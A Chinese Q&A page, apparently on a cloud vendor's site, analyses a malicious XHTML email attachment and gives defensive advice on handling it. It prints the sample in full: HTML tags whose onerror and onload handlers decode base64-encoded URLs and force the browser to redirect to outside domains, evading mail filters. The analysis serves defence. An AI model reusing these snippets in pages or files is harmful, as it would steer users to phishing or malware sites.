You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

邮件附件中的xhtml文件含可疑JS代码,请问其危害及对操作系统的影响?

恶意样本代码
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));"></video>

<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">  

<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));"></body>

<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));">

<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');">
恶意程度判定

属于中高危的引流型恶意载荷:

  • 代码本身不会直接破坏本地操作系统,但是典型的恶意邮件附件载荷,核心目的是绕过邮件安全检测,强制诱导用户跳转至恶意站点
  • 跳转后的站点大概率会实施钓鱼诈骗、诱导下载恶意软件、利用浏览器漏洞植入远控木马、窃取用户账户凭据等高危操作,最终可能造成用户财产损失、隐私泄露、设备被控制等严重后果
  • 如果浏览器开启了严格的本地文件安全限制、恶意域名拦截规则,触发实际危害的概率会降低,但该文件本身属于明确的恶意攻击载体,绝对不能直接打开。
触发后的行为逻辑

这类XHTML文件被浏览器打开后,会按以下顺序执行操作:

  1. 通过多触发机制保证跳转逻辑必执行:要么是不存在的视频、图片、样式资源加载失败触发onerror事件,要么是页面加载完成触发onload事件,避免单一触发逻辑失效
  2. 调用window.atob解码base64编码的恶意站点URL,用编码方式规避邮件网关的明文恶意URL检测
  3. 调用document.location.replace/document.location.href强制当前页面跳转到恶意站点,且使用replace方式时不会留存当前页面的回退记录,避免用户轻易返回正常页面。
处置建议
  • 直接删除所有收到的可疑XHTML附件,不要点击或尝试打开
  • 关闭邮件客户端的未知来源附件自动下载、自动打开功能
  • 如果已经误打开过这类文件,建议立即使用安全软件全盘扫描系统,排查是否有恶意软件被植入,同时修改所有敏感账户的登录密码

内容的提问来源于stack exchange,提问作者Pro

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.10.03 06:18:00